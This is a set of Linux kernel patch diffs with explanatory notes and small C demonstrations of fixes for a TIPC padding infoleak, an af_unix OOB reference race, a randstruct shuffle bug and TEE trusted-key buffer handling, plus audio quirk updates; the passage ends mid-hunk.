+diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c
+index dfea27a906f2f..9eb7cab6b2f60 100644
+--- a/net/tipc/netlink_compat.c
++++ b/net/tipc/netlink_compat.c
+@@ -101,6 +101,7 @@ static int tipc_add_tlv(struct sk_buff *skb, u16 type, void *data, u16 len)
+ 		return -EMSGSIZE;
+ 
+ 	skb_put(skb, TLV_SPACE(len));
++	memset(tlv, 0, TLV_SPACE(len));
+ 	tlv->tlv_type = htons(type);
+ 	tlv->tlv_len = htons(TLV_LENGTH(len));
+ 	if (len && data)
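
The added memset closes a kernel infoleak: TLV_SPACE() rounds the descriptor-plus-payload length up to 4-byte alignment and skb_put() does not zero the reserved bytes, so the alignment padding (and the payload area when data is NULL) used to carry stale heap contents out to userspace. The padding arithmetic, mirroring the macros in uapi/linux/tipc_config.h (the descriptor is two __be16 fields, four bytes total):

#include <stdio.h>

#define TLV_ALIGNTO	4
#define TLV_ALIGN(x)	(((x) + (TLV_ALIGNTO - 1)) & ~(TLV_ALIGNTO - 1))
#define TLV_LENGTH(len)	(4 + (len))	/* descriptor + payload */
#define TLV_SPACE(len)	TLV_ALIGN(TLV_LENGTH(len))

int main(void)
{
	int len = 5;	/* example payload size */

	/* 9 bytes of TLV occupy 12 bytes on the wire: 3 pad bytes that
	 * must be zeroed or they leak allocator leftovers. */
	printf("length=%d space=%d pad=%d\n", TLV_LENGTH(len),
	       TLV_SPACE(len), TLV_SPACE(len) - TLV_LENGTH(len));
	return 0;
}
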
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 310952f4c68f7..6dbeb80073338 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2641,15 +2641,16 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 
+ 	if (!(state->flags & MSG_PEEK))
+ 		WRITE_ONCE(u->oob_skb, NULL);
+-
++	else
++		skb_get(oob_skb);
+ 	unix_state_unlock(sk);
+ 
+ 	chunk = state->recv_actor(oob_skb, 0, chunk, state);
+ 
+-	if (!(state->flags & MSG_PEEK)) {
++	if (!(state->flags & MSG_PEEK))
+ 		UNIXCB(oob_skb).consumed += 1;
+-		kfree_skb(oob_skb);
+-	}
++
++	consume_skb(oob_skb);
+ 
+ 	mutex_unlock(&u->iolock);
+ 
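
The af_unix change makes the OOB reference counting symmetric: with MSG_PEEK the skb now takes an extra reference (skb_get) before the state lock is dropped, so a concurrent reader consuming the OOB skb cannot free it under recv_actor(), and both paths then release exactly the one reference this function owns via consume_skb(). A toy trace of the two paths with a hand-rolled counter (not the kernel's skb API):

#include <stdio.h>

struct skb { int refs; };

static void get(struct skb *s) { s->refs++; }

static void put(struct skb *s)
{
	if (--s->refs == 0)
		printf("  skb freed\n");
}

static void recv_urg(struct skb *oob, int peek)
{
	if (peek)
		get(oob);	/* pin the skb across the unlocked section */
	/* else: we own the queue's reference (u->oob_skb = NULL) */

	/* ... recv_actor() runs here with the state lock released ... */

	put(oob);		/* consume_skb(): drop the ref we own */
	printf("peek=%d -> refs=%d\n", peek, oob->refs);
}

int main(void)
{
	struct skb a = { .refs = 1 };	/* reference held by the queue */
	struct skb b = { .refs = 1 };

	recv_urg(&a, 1);	/* peek: queue keeps its reference, refs=1 */
	recv_urg(&b, 0);	/* consume: last reference dropped, refs=0 */
	return 0;
}
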
+diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
+index 8360c790a8a01..84471745c0829 100644
+--- a/net/vmw_vsock/af_vsock.c
++++ b/net/vmw_vsock/af_vsock.c
+@@ -89,6 +89,7 @@
+ #include <linux/types.h>
+ #include <linux/bitops.h>
+ #include <linux/cred.h>
++#include <linux/errqueue.h>
+ #include <linux/init.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+@@ -110,6 +111,7 @@
+ #include <linux/workqueue.h>
+ #include <net/sock.h>
+ #include <net/af_vsock.h>
++#include <uapi/linux/vm_sockets.h>
+ 
+ static int __vsock_bind(struct sock *sk, struct sockaddr_vm *addr);
+ static void vsock_sk_destruct(struct sock *sk);
+@@ -2096,6 +2098,10 @@ vsock_connectible_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	int err;
+ 
+ 	sk = sock->sk;
++
++	if (unlikely(flags & MSG_ERRQUEUE))
++		return sock_recv_errqueue(sk, msg, len, SOL_VSOCK, VSOCK_RECVERR);
++
+ 	vsk = vsock_sk(sk);
+ 	err = 0;
+ 
+diff --git a/scripts/gcc-plugins/randomize_layout_plugin.c b/scripts/gcc-plugins/randomize_layout_plugin.c
+index 951b74ba1b242..366395cab490d 100644
+--- a/scripts/gcc-plugins/randomize_layout_plugin.c
++++ b/scripts/gcc-plugins/randomize_layout_plugin.c
+@@ -191,12 +191,14 @@ static void partition_struct(tree *fields, unsigned long length, struct partitio
+ 
+ static void performance_shuffle(tree *newtree, unsigned long length, ranctx *prng_state)
+ {
+-	unsigned long i, x;
++	unsigned long i, x, index;
+ 	struct partition_group size_group[length];
+ 	unsigned long num_groups = 0;
+ 	unsigned long randnum;
+ 
+ 	partition_struct(newtree, length, (struct partition_group *)&size_group, &num_groups);
++
++	/* FIXME: this group shuffle is currently a no-op. */
+ 	for (i = num_groups - 1; i > 0; i--) {
+ 		struct partition_group tmp;
+ 		randnum = ranval(prng_state) % (i + 1);
+@@ -206,11 +208,14 @@ static void performance_shuffle(tree *newtree, unsigned long length, ranctx *prn
+ 	}
+ 
+ 	for (x = 0; x < num_groups; x++) {
+-		for (i = size_group[x].start + size_group[x].length - 1; i > size_group[x].start; i--) {
++		for (index = size_group[x].length - 1; index > 0; index--) {
+ 			tree tmp;
++
++			i = size_group[x].start + index;
+ 			if (DECL_BIT_FIELD_TYPE(newtree[i]))
+ 				continue;
+-			randnum = ranval(prng_state) % (i + 1);
++			randnum = ranval(prng_state) % (index + 1);
++			randnum += size_group[x].start;
+ 			// we could handle this case differently if desired
+ 			if (DECL_BIT_FIELD_TYPE(newtree[randnum]))
+ 				continue;
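
The plugin fix restores a correct per-group Fisher-Yates shuffle: the old loop drew randnum from the absolute element index i, so for any group after the first the swap partner could land outside the group entirely. Drawing from the position within the group and rebasing by the group's start keeps every swap in bounds and the permutation uniform. A standalone version of the corrected loop (assumes POSIX rand_r):

#include <stdio.h>
#include <stdlib.h>

/* In-place Fisher-Yates over elems[start .. start+len-1] only; the
 * partner index is drawn within the group and rebased by its start,
 * mirroring the corrected loop above. */
static void shuffle_group(int *elems, unsigned long start,
			  unsigned long len, unsigned int *seed)
{
	if (!len)
		return;
	for (unsigned long index = len - 1; index > 0; index--) {
		unsigned long i = start + index;
		unsigned long j = start + rand_r(seed) % (index + 1);
		int tmp = elems[i];

		elems[i] = elems[j];
		elems[j] = tmp;
	}
}

int main(void)
{
	int v[8] = {0, 1, 2, 3, 4, 5, 6, 7};
	unsigned int seed = 42;

	shuffle_group(v, 2, 4, &seed);	/* permutes v[2..5] only */
	for (int i = 0; i < 8; i++)
		printf("%d ", v[i]);
	printf("\n");
	return 0;
}
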
+diff --git a/security/integrity/iint.c b/security/integrity/iint.c
+index 65418e0906c13..cb251ab0e7076 100644
+--- a/security/integrity/iint.c
++++ b/security/integrity/iint.c
+@@ -66,9 +66,32 @@ struct integrity_iint_cache *integrity_iint_find(struct inode *inode)
+ 	return iint;
+ }
+ 
+-static void iint_free(struct integrity_iint_cache *iint)
++#define IMA_MAX_NESTING (FILESYSTEM_MAX_STACK_DEPTH+1)
++
++/*
++ * It is not clear that IMA should be nested at all, but as long as it measures
++ * files both on overlayfs and on the underlying fs, we need to annotate the iint
++ * mutex to avoid lockdep false positives related to IMA + overlayfs.
++ * See ovl_lockdep_annotate_inode_mutex_key() for more details.
++ */
++static inline void iint_lockdep_annotate(struct integrity_iint_cache *iint,
++					 struct inode *inode)
++{
++#ifdef CONFIG_LOCKDEP
++	static struct lock_class_key iint_mutex_key[IMA_MAX_NESTING];
++
++	int depth = inode->i_sb->s_stack_depth;
++
++	if (WARN_ON_ONCE(depth < 0 || depth >= IMA_MAX_NESTING))
++		depth = 0;
++
++	lockdep_set_class(&iint->mutex, &iint_mutex_key[depth]);
++#endif
++}
++
++static void iint_init_always(struct integrity_iint_cache *iint,
++			     struct inode *inode)
+ {
+-	kfree(iint->ima_hash);
+ 	iint->ima_hash = NULL;
+ 	iint->version = 0;
+ 	iint->flags = 0UL;
+@@ -80,6 +103,14 @@ static void iint_free(struct integrity_iint_cache *iint)
+ 	iint->ima_creds_status = INTEGRITY_UNKNOWN;
+ 	iint->evm_status = INTEGRITY_UNKNOWN;
+ 	iint->measured_pcrs = 0;
++	mutex_init(&iint->mutex);
++	iint_lockdep_annotate(iint, inode);
++}
++
++static void iint_free(struct integrity_iint_cache *iint)
++{
++	kfree(iint->ima_hash);
++	mutex_destroy(&iint->mutex);
+ 	kmem_cache_free(iint_cache, iint);
+ }
+ 
+@@ -112,6 +143,8 @@ struct integrity_iint_cache *integrity_inode_get(struct inode *inode)
+ 	if (!iint)
+ 		return NULL;
+ 
++	iint_init_always(iint, inode);
++
+ 	write_lock(&integrity_iint_lock);
+ 
+ 	p = &integrity_iint_tree.rb_node;
+@@ -161,25 +194,18 @@ void integrity_inode_free(struct inode *inode)
+ 	iint_free(iint);
+ }
+ 
+-static void init_once(void *foo)
++static void iint_init_once(void *foo)
+ {
+ 	struct integrity_iint_cache *iint = (struct integrity_iint_cache *) foo;
+ 
+ 	memset(iint, 0, sizeof(*iint));
+-	iint->ima_file_status = INTEGRITY_UNKNOWN;
+-	iint->ima_mmap_status = INTEGRITY_UNKNOWN;
+-	iint->ima_bprm_status = INTEGRITY_UNKNOWN;
+-	iint->ima_read_status = INTEGRITY_UNKNOWN;
+-	iint->ima_creds_status = INTEGRITY_UNKNOWN;
+-	iint->evm_status = INTEGRITY_UNKNOWN;
+-	mutex_init(&iint->mutex);
+ }
+ 
+ static int __init integrity_iintcache_init(void)
+ {
+ 	iint_cache =
+ 	    kmem_cache_create("iint_cache", sizeof(struct integrity_iint_cache),
+-			      0, SLAB_PANIC, init_once);
++			      0, SLAB_PANIC, iint_init_once);
+ 	return 0;
+ }
+ DEFINE_LSM(integrity) = {
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index 1e3a7a4f8833f..026c8c9db9920 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -243,6 +243,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ {
+ 	const char *audit_cause = "failed";
+ 	struct inode *inode = file_inode(file);
++	struct inode *real_inode = d_real_inode(file_dentry(file));
+ 	const char *filename = file->f_path.dentry->d_name.name;
+ 	struct ima_max_digest_data hash;
+ 	int result = 0;
+@@ -305,6 +306,10 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 	iint->ima_hash = tmpbuf;
+ 	memcpy(iint->ima_hash, &hash, length);
+ 	iint->version = i_version;
++	if (real_inode != inode) {
++		iint->real_ino = real_inode->i_ino;
++		iint->real_dev = real_inode->i_sb->s_dev;
++	}
+ 
+ 	/* Possibly temporary failure due to type of read (eg. O_DIRECT) */
+ 	if (!result)
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index bc84a0ac25aaa..185666d90eebc 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -26,6 +26,7 @@
+ #include <linux/ima.h>
+ #include <linux/iversion.h>
+ #include <linux/fs.h>
++#include <linux/iversion.h>
+ 
+ #include "ima.h"
+ 
+@@ -202,7 +203,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 			       u32 secid, char *buf, loff_t size, int mask,
+ 			       enum ima_hooks func)
+ {
+-	struct inode *inode = file_inode(file);
++	struct inode *backing_inode, *inode = file_inode(file);
+ 	struct integrity_iint_cache *iint = NULL;
+ 	struct ima_template_desc *template_desc = NULL;
+ 	char *pathbuf = NULL;
+@@ -278,6 +279,19 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 		iint->measured_pcrs = 0;
+ 	}
+ 
++	/* Detect and re-evaluate changes made to the backing file. */
++	backing_inode = d_real_inode(file_dentry(file));
++	if (backing_inode != inode &&
++	    (action & IMA_DO_MASK) && (iint->flags & IMA_DONE_MASK)) {
++		if (!IS_I_VERSION(backing_inode) ||
++		    backing_inode->i_sb->s_dev != iint->real_dev ||
++		    backing_inode->i_ino != iint->real_ino ||
++		    !inode_eq_iversion(backing_inode, iint->version)) {
++			iint->flags &= ~IMA_DONE_MASK;
++			iint->measured_pcrs = 0;
++		}
++	}
++
+ 	/* Determine if already appraised/measured based on bitmask
+ 	 * (IMA_MEASURE, IMA_MEASURED, IMA_XXXX_APPRAISE, IMA_XXXX_APPRAISED,
+ 	 *  IMA_AUDIT, IMA_AUDITED)
+diff --git a/security/integrity/integrity.h b/security/integrity/integrity.h
+index 7167a6e99bdc0..52c3c806bf69f 100644
+--- a/security/integrity/integrity.h
++++ b/security/integrity/integrity.h
+@@ -164,6 +164,8 @@ struct integrity_iint_cache {
+ 	unsigned long flags;
+ 	unsigned long measured_pcrs;
+ 	unsigned long atomic_flags;
++	unsigned long real_ino;
++	dev_t real_dev;
+ 	enum integrity_status ima_file_status:4;
+ 	enum integrity_status ima_mmap_status:4;
+ 	enum integrity_status ima_bprm_status:4;
+diff --git a/security/keys/trusted-keys/trusted_core.c b/security/keys/trusted-keys/trusted_core.c
+index 85fb5c22529a7..fee1ab2c734d3 100644
+--- a/security/keys/trusted-keys/trusted_core.c
++++ b/security/keys/trusted-keys/trusted_core.c
+@@ -358,17 +358,17 @@ static int __init init_trusted(void)
+ 		if (!get_random)
+ 			get_random = kernel_get_random;
+ 
+-		static_call_update(trusted_key_seal,
+-				   trusted_key_sources[i].ops->seal);
+-		static_call_update(trusted_key_unseal,
+-				   trusted_key_sources[i].ops->unseal);
+-		static_call_update(trusted_key_get_random,
+-				   get_random);
+-		trusted_key_exit = trusted_key_sources[i].ops->exit;
+-		migratable = trusted_key_sources[i].ops->migratable;
+-
+ 		ret = trusted_key_sources[i].ops->init();
+-		if (!ret)
++		if (!ret) {
++			static_call_update(trusted_key_seal, trusted_key_sources[i].ops->seal);
++			static_call_update(trusted_key_unseal, trusted_key_sources[i].ops->unseal);
++			static_call_update(trusted_key_get_random, get_random);
++
++			trusted_key_exit = trusted_key_sources[i].ops->exit;
++			migratable = trusted_key_sources[i].ops->migratable;
++		}
++
++		if (!ret || ret != -ENODEV)
+ 			break;
+ 	}
+ 
+diff --git a/security/keys/trusted-keys/trusted_tee.c b/security/keys/trusted-keys/trusted_tee.c
+index c8626686ee1b7..24f67ca8d7131 100644
+--- a/security/keys/trusted-keys/trusted_tee.c
++++ b/security/keys/trusted-keys/trusted_tee.c
+@@ -65,24 +65,16 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 	int ret;
+ 	struct tee_ioctl_invoke_arg inv_arg;
+ 	struct tee_param param[4];
+-	struct tee_shm *reg_shm_in = NULL, *reg_shm_out = NULL;
++	struct tee_shm *reg_shm = NULL;
+ 
+ 	memset(&inv_arg, 0, sizeof(inv_arg));
+ 	memset(&param, 0, sizeof(param));
+ 
+-	reg_shm_in = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
+-						 p->key_len);
+-	if (IS_ERR(reg_shm_in)) {
+-		dev_err(pvt_data.dev, "key shm register failed\n");
+-		return PTR_ERR(reg_shm_in);
+-	}
+-
+-	reg_shm_out = tee_shm_register_kernel_buf(pvt_data.ctx, p->blob,
+-						  sizeof(p->blob));
+-	if (IS_ERR(reg_shm_out)) {
+-		dev_err(pvt_data.dev, "blob shm register failed\n");
+-		ret = PTR_ERR(reg_shm_out);
+-		goto out;
++	reg_shm = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
++					      sizeof(p->key) + sizeof(p->blob));
++	if (IS_ERR(reg_shm)) {
++		dev_err(pvt_data.dev, "shm register failed\n");
++		return PTR_ERR(reg_shm);
+ 	}
+ 
+ 	inv_arg.func = TA_CMD_SEAL;
+@@ -90,13 +82,13 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 	inv_arg.num_params = 4;
+ 
+ 	param[0].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_INPUT;
+-	param[0].u.memref.shm = reg_shm_in;
++	param[0].u.memref.shm = reg_shm;
+ 	param[0].u.memref.size = p->key_len;
+ 	param[0].u.memref.shm_offs = 0;
+ 	param[1].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_OUTPUT;
+-	param[1].u.memref.shm = reg_shm_out;
++	param[1].u.memref.shm = reg_shm;
+ 	param[1].u.memref.size = sizeof(p->blob);
+-	param[1].u.memref.shm_offs = 0;
++	param[1].u.memref.shm_offs = sizeof(p->key);
+ 
+ 	ret = tee_client_invoke_func(pvt_data.ctx, &inv_arg, param);
+ 	if ((ret < 0) || (inv_arg.ret != 0)) {
+@@ -107,11 +99,7 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 		p->blob_len = param[1].u.memref.size;
+ 	}
+ 
+-out:
+-	if (reg_shm_out)
+-		tee_shm_free(reg_shm_out);
+-	if (reg_shm_in)
+-		tee_shm_free(reg_shm_in);
++	tee_shm_free(reg_shm);
+ 
+ 	return ret;
+ }
+@@ -124,24 +112,16 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 	int ret;
+ 	struct tee_ioctl_invoke_arg inv_arg;
+ 	struct tee_param param[4];
+-	struct tee_shm *reg_shm_in = NULL, *reg_shm_out = NULL;
++	struct tee_shm *reg_shm = NULL;
+ 
+ 	memset(&inv_arg, 0, sizeof(inv_arg));
+ 	memset(&param, 0, sizeof(param));
+ 
+-	reg_shm_in = tee_shm_register_kernel_buf(pvt_data.ctx, p->blob,
+-						 p->blob_len);
+-	if (IS_ERR(reg_shm_in)) {
+-		dev_err(pvt_data.dev, "blob shm register failed\n");
+-		return PTR_ERR(reg_shm_in);
+-	}
+-
+-	reg_shm_out = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
+-						  sizeof(p->key));
+-	if (IS_ERR(reg_shm_out)) {
+-		dev_err(pvt_data.dev, "key shm register failed\n");
+-		ret = PTR_ERR(reg_shm_out);
+-		goto out;
++	reg_shm = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
++					      sizeof(p->key) + sizeof(p->blob));
++	if (IS_ERR(reg_shm)) {
++		dev_err(pvt_data.dev, "shm register failed\n");
++		return PTR_ERR(reg_shm);
+ 	}
+ 
+ 	inv_arg.func = TA_CMD_UNSEAL;
+@@ -149,11 +129,11 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 	inv_arg.num_params = 4;
+ 
+ 	param[0].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_INPUT;
+-	param[0].u.memref.shm = reg_shm_in;
++	param[0].u.memref.shm = reg_shm;
+ 	param[0].u.memref.size = p->blob_len;
+-	param[0].u.memref.shm_offs = 0;
++	param[0].u.memref.shm_offs = sizeof(p->key);
+ 	param[1].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_OUTPUT;
+-	param[1].u.memref.shm = reg_shm_out;
++	param[1].u.memref.shm = reg_shm;
+ 	param[1].u.memref.size = sizeof(p->key);
+ 	param[1].u.memref.shm_offs = 0;
+ 
+@@ -166,11 +146,7 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 		p->key_len = param[1].u.memref.size;
+ 	}
+ 
+-out:
+-	if (reg_shm_out)
+-		tee_shm_free(reg_shm_out);
+-	if (reg_shm_in)
+-		tee_shm_free(reg_shm_in);
++	tee_shm_free(reg_shm);
+ 
+ 	return ret;
+ }
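
Both the seal and unseal paths now register a single shared-memory object spanning the adjacent key and blob fields of struct trusted_key_payload and select each half with shm_offs, instead of registering two separate buffers. A small layout sketch of the offset scheme (field sizes here are illustrative, not the kernel's):

#include <stddef.h>
#include <stdio.h>

/* Illustrative stand-in for the adjacent fields being registered. */
struct payload {
	unsigned char key[128];
	unsigned char blob[512];
};

int main(void)
{
	/* One registration covers both fields; each TEE param picks a
	 * region by offset: key at 0, blob at sizeof(key). */
	printf("register %zu bytes: key@%zu blob@%zu\n",
	       sizeof(struct payload),
	       offsetof(struct payload, key),
	       offsetof(struct payload, blob));
	return 0;
}
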
+diff --git a/sound/core/info.c b/sound/core/info.c
+index 0b2f04dcb5897..e2f302e55bbb2 100644
+--- a/sound/core/info.c
++++ b/sound/core/info.c
+@@ -56,7 +56,7 @@ struct snd_info_private_data {
+ };
+ 
+ static int snd_info_version_init(void);
+-static void snd_info_disconnect(struct snd_info_entry *entry);
++static void snd_info_clear_entries(struct snd_info_entry *entry);
+ 
+ /*
+ 
+@@ -569,11 +569,16 @@ void snd_info_card_disconnect(struct snd_card *card)
+ {
+ 	if (!card)
+ 		return;
+-	mutex_lock(&info_mutex);
++
+ 	proc_remove(card->proc_root_link);
+-	card->proc_root_link = NULL;
+ 	if (card->proc_root)
+-		snd_info_disconnect(card->proc_root);
++		proc_remove(card->proc_root->p);
++
++	mutex_lock(&info_mutex);
++	if (card->proc_root)
++		snd_info_clear_entries(card->proc_root);
++	card->proc_root_link = NULL;
++	card->proc_root = NULL;
+ 	mutex_unlock(&info_mutex);
+ }
+ 
+@@ -745,15 +750,14 @@ struct snd_info_entry *snd_info_create_card_entry(struct snd_card *card,
+ }
+ EXPORT_SYMBOL(snd_info_create_card_entry);
+ 
+-static void snd_info_disconnect(struct snd_info_entry *entry)
++static void snd_info_clear_entries(struct snd_info_entry *entry)
+ {
+ 	struct snd_info_entry *p;
+ 
+ 	if (!entry->p)
+ 		return;
+ 	list_for_each_entry(p, &entry->children, list)
+-		snd_info_disconnect(p);
+-	proc_remove(entry->p);
++		snd_info_clear_entries(p);
+ 	entry->p = NULL;
+ }
+ 
+@@ -770,8 +774,9 @@ void snd_info_free_entry(struct snd_info_entry * entry)
+ 	if (!entry)
+ 		return;
+ 	if (entry->p) {
++		proc_remove(entry->p);
+ 		mutex_lock(&info_mutex);
+-		snd_info_disconnect(entry);
++		snd_info_clear_entries(entry);
+ 		mutex_unlock(&info_mutex);
+ 	}
+ 
+diff --git a/sound/hda/hdac_stream.c b/sound/hda/hdac_stream.c
+index 1b8be39c38a96..741a5d17ae4cb 100644
+--- a/sound/hda/hdac_stream.c
++++ b/sound/hda/hdac_stream.c
+@@ -338,8 +338,10 @@ struct hdac_stream *snd_hdac_stream_assign(struct hdac_bus *bus,
+ 	struct hdac_stream *res = NULL;
+ 
+ 	/* make a non-zero unique key for the substream */
+-	int key = (substream->pcm->device << 16) | (substream->number << 2) |
+-		(substream->stream + 1);
++	int key = (substream->number << 2) | (substream->stream + 1);
++
++	if (substream->pcm)
++		key |= (substream->pcm->device << 16);
+ 
+ 	spin_lock_irq(&bus->reg_lock);
+ 	list_for_each_entry(azx_dev, &bus->stream_list, list) {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 0163d4c7fdda8..b63e12b661996 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9624,6 +9624,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x890e, "HP 255 G8 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9659,6 +9660,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9692,12 +9694,16 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x10a1, "ASUS UX391UA", ALC294_FIXUP_ASUS_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x10c0, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x10d0, "ASUS X540LA/X540LJ", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x10d3, "ASUS K6500ZC", ALC294_FIXUP_ASUS_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x115d, "Asus 1015E", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x11c0, "ASUS X556UR", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x125e, "ASUS Q524UQK", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+@@ -9749,6 +9755,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+ 	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+@@ -10590,22 +10597,6 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+ 		{0x12, 0x90a60130},
+ 		{0x17, 0x90170110},
+ 		{0x21, 0x03211020}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+-		{0x14, 0x90170110},
+-		{0x21, 0x04211020}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+-		{0x14, 0x90170110},
+-		{0x21, 0x04211030}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS,
+-		{0x17, 0x21014020},
+-		{0x18, 0x21a19030}),
